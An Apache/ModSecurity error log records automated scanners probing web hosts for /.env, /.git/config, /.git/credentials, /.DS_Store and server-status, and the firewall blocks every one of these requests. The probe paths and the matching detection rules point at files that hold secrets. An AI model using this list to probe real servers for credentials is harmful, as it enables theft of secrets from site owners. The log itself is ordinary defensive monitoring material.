[Wed Oct 22 14:37:27.358899 2025] [:error] [pid 3668725] [client 206.81.24.74:51260] [client 206.81.24.74] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aPjQB54MKcqD5Eut8MVZkwAAAAY"]
[Wed Oct 22 14:37:27.359106 2025] [:error] [pid 3668725] [client 206.81.24.74:51260] [client 206.81.24.74] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aPjQB54MKcqD5Eut8MVZkwAAAAY"]
[Wed Oct 22 14:37:27.359264 2025] [:error] [pid 3668725] [client 206.81.24.74:51260] [client 206.81.24.74] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aPjQB54MKcqD5Eut8MVZkwAAAAY"]
[Wed Oct 22 14:37:27.564616 2025] [:error] [pid 3679801] [client 206.81.24.74:51272] [client 206.81.24.74] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aPjQB57XUqOYsty5cO_rrQAAAAo"]
[Wed Oct 22 14:37:27.564833 2025] [:error] [pid 3679801] [client 206.81.24.74:51272] [client 206.81.24.74] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aPjQB57XUqOYsty5cO_rrQAAAAo"]
[Wed Oct 22 14:37:27.565001 2025] [:error] [pid 3679801] [client 206.81.24.74:51272] [client 206.81.24.74] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aPjQB57XUqOYsty5cO_rrQAAAAo"]
[Wed Oct 22 16:04:08.326312 2025] [authz_core:error] [pid 3679850] [client 206.81.24.227:60624] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Wed Oct 22 16:04:09.992716 2025] [:error] [pid 3668489] [client 206.81.24.227:60648] [client 206.81.24.227] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aPjkWeXOXMfSv8NMtrFiJwAAAAM"]
[Wed Oct 22 16:04:09.992926 2025] [:error] [pid 3668489] [client 206.81.24.227:60648] [client 206.81.24.227] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aPjkWeXOXMfSv8NMtrFiJwAAAAM"]
[Wed Oct 22 16:04:09.993096 2025] [:error] [pid 3668489] [client 206.81.24.227:60648] [client 206.81.24.227] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aPjkWeXOXMfSv8NMtrFiJwAAAAM"]
[Wed Oct 22 16:04:10.539158 2025] [:error] [pid 3678602] [client 206.81.24.227:58644] [client 206.81.24.227] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aPjkWtT1_CQ1KJaounX17gAAAAs"]
[Wed Oct 22 16:04:10.539370 2025] [:error] [pid 3678602] [client 206.81.24.227:58644] [client 206.81.24.227] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aPjkWtT1_CQ1KJaounX17gAAAAs"]
[Wed Oct 22 16:04:10.539550 2025] [:error] [pid 3678602] [client 206.81.24.227:58644] [client 206.81.24.227] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aPjkWtT1_CQ1KJaounX17gAAAAs"]
[Wed Oct 22 16:04:10.979771 2025] [:error] [pid 3668725] [client 206.81.24.227:58660] [client 206.81.24.227] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aPjkWp4MKcqD5Eut8MVZrQAAAAY"]
[Wed Oct 22 16:04:10.979996 2025] [:error] [pid 3668725] [client 206.81.24.227:58660] [client 206.81.24.227] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aPjkWp4MKcqD5Eut8MVZrQAAAAY"]
[Wed Oct 22 16:04:10.980186 2025] [:error] [pid 3668725] [client 206.81.24.227:58660] [client 206.81.24.227] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aPjkWp4MKcqD5Eut8MVZrQAAAAY"]
[Wed Oct 22 23:13:40.519876 2025] [:error] [pid 3668709] [client 104.238.214.193:41316] [client 104.238.214.193] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aPlJBFdA3p6fcszgFKAMWQAAAAU"]
[Wed Oct 22 23:13:40.520140 2025] [:error] [pid 3668709] [client 104.238.214.193:41316] [client 104.238.214.193] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aPlJBFdA3p6fcszgFKAMWQAAAAU"]
[Wed Oct 22 23:13:40.520315 2025] [:error] [pid 3668709] [client 104.238.214.193:41316] [client 104.238.214.193] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aPlJBFdA3p6fcszgFKAMWQAAAAU"]
[Thu Oct 23 16:03:37.475445 2025] [:error] [pid 3700015] [client 147.124.222.51:48608] [client 147.124.222.51] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/credentials"] [unique_id "aPo1uXhJC_JQRAUA_30sPAAAAAo"]
[Thu Oct 23 16:03:37.475704 2025] [:error] [pid 3700015] [client 147.124.222.51:48608] [client 147.124.222.51] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/credentials"] [unique_id "aPo1uXhJC_JQRAUA_30sPAAAAAo"]
[Thu Oct 23 16:03:37.475857 2025] [:error] [pid 3700015] [client 147.124.222.51:48608] [client 147.124.222.51] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/credentials"] [unique_id "aPo1uXhJC_JQRAUA_30sPAAAAAo"]
[Thu Oct 23 16:03:37.475918 2025] [:error] [pid 3700013] [client 147.124.222.51:48607] [client 147.124.222.51] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aPo1ubbxGWCFKYAjZlo_tgAAAAg"]
[Thu Oct 23 16:03:37.476145 2025] [:error] [pid 3700013] [client 147.124.222.51:48607] [client 147.124.222.51] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aPo1ubbxGWCFKYAjZlo_tgAAAAg"]
[Thu Oct 23 16:03:37.476330 2025] [:error] [pid 3700013] [client 147.124.222.51:48607] [client 147.124.222.51] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aPo1ubbxGWCFKYAjZlo_tgAAAAg"]
[Fri Oct 24 14:21:01.700707 2025] [:error] [pid 3728061] [client 3.140.182.19:45273] [client 3.140.182.19] ModSecurity: Warning. Matched phrase "zgrab" at REQUEST_HEADERS:User-Agent. [file "/usr/share/modsecurity-crs/rules/REQUEST-913-SCANNER-DETECTION.conf"] [line "55"] [id "913100"] [msg "Found User-Agent associated with security scanner"] [data "Matched Data: zgrab found within REQUEST_HEADERS:User-Agent: mozilla/5.0 zgrab/0.x"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-reputation-scanner"] [tag "OWASP_CRS"] [tag "OWASP_CRS/AUTOMATION/SECURITY_SCANNER"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "aPtvLU9m3mCjYJYV2KTVMwAAAAQ"]
[Fri Oct 24 14:21:01.701148 2025] [:error] [pid 3728061] [client 3.140.182.19:45273] [client 3.140.182.19] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "aPtvLU9m3mCjYJYV2KTVMwAAAAQ"]
[Fri Oct 24 14:21:01.701330 2025] [:error] [pid 3728061] [client 3.140.182.19:45273] [client 3.140.182.19] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "aPtvLU9m3mCjYJYV2KTVMwAAAAQ"]
[Fri Oct 24 15:12:53.153515 2025] [authz_core:error] [pid 3728425] [client 138.197.191.87:41934] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Fri Oct 24 15:12:54.736301 2025] [:error] [pid 3730597] [client 138.197.191.87:41970] [client 138.197.191.87] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aPt7VnEmxHlqAvjGXovmEgAAAAM"]
[Fri Oct 24 15:12:54.736601 2025] [:error] [pid 3730597] [client 138.197.191.87:41970] [client 138.197.191.87] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aPt7VnEmxHlqAvjGXovmEgAAAAM"]
[Fri Oct 24 15:12:54.736846 2025] [:error] [pid 3730597] [client 138.197.191.87:41970] [client 138.197.191.87] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aPt7VnEmxHlqAvjGXovmEgAAAAM"]
[Fri Oct 24 15:12:54.809968 2025] [:error] [pid 3722556] [client 138.197.191.87:41984] [client 138.197.191.87] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aPt7Vo4wJNhUhIt3vUHc2gAAAB0"]
[Fri Oct 24 15:12:54.810180 2025] [:error] [pid 3722556] [client 138.197.191.87:41984] [client 138.197.191.87] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aPt7Vo4wJNhUhIt3vUHc2gAAAB0"]
[Fri Oct 24 15:12:54.810401 2025] [:error] [pid 3722556] [client 138.197.191.87:41984] [client 138.197.191.87] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aPt7Vo4wJNhUhIt3vUHc2gAAAB0"]
[Fri Oct 24 15:12:54.873235 2025] [:error] [pid 3723001] [client 138.197.191.87:41988] [client 138.197.191.87] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aPt7VnhDPNrJbMub4RfzQAAAAAA"]
[Fri Oct 24 15:12:54.873450 2025] [:error] [pid 3723001] [client 138.197.191.87:41988] [client 138.197.191.87] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aPt7VnhDPNrJbMub4RfzQAAAAAA"]
[Fri Oct 24 15:12:54.873609 2025] [:error] [pid 3723001] [client 138.197.191.87:41988] [client 138.197.191.87] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aPt7VnhDPNrJbMub4RfzQAAAAAA"]
[Fri Oct 24 15:32:58.305665 2025] [authz_core:error] [pid 3730842] [client 159.89.174.87:36378] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Fri Oct 24 15:32:59.697431 2025] [:error] [pid 3730841] [client 159.89.174.87:36406] [client 159.89.174.87] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aPuAC6tAWIFv2eunAFhMwgAAAAI"]
[Fri Oct 24 15:32:59.697657 2025] [:error] [pid 3730841] [client 159.89.174.87:36406] [client 159.89.174.87] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aPuAC6tAWIFv2eunAFhMwgAAAAI"]
[Fri Oct 24 15:32:59.698710 2025] [:error] [pid 3730841] [client 159.89.174.87:36406] [client 159.89.174.87] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aPuAC6tAWIFv2eunAFhMwgAAAAI"]
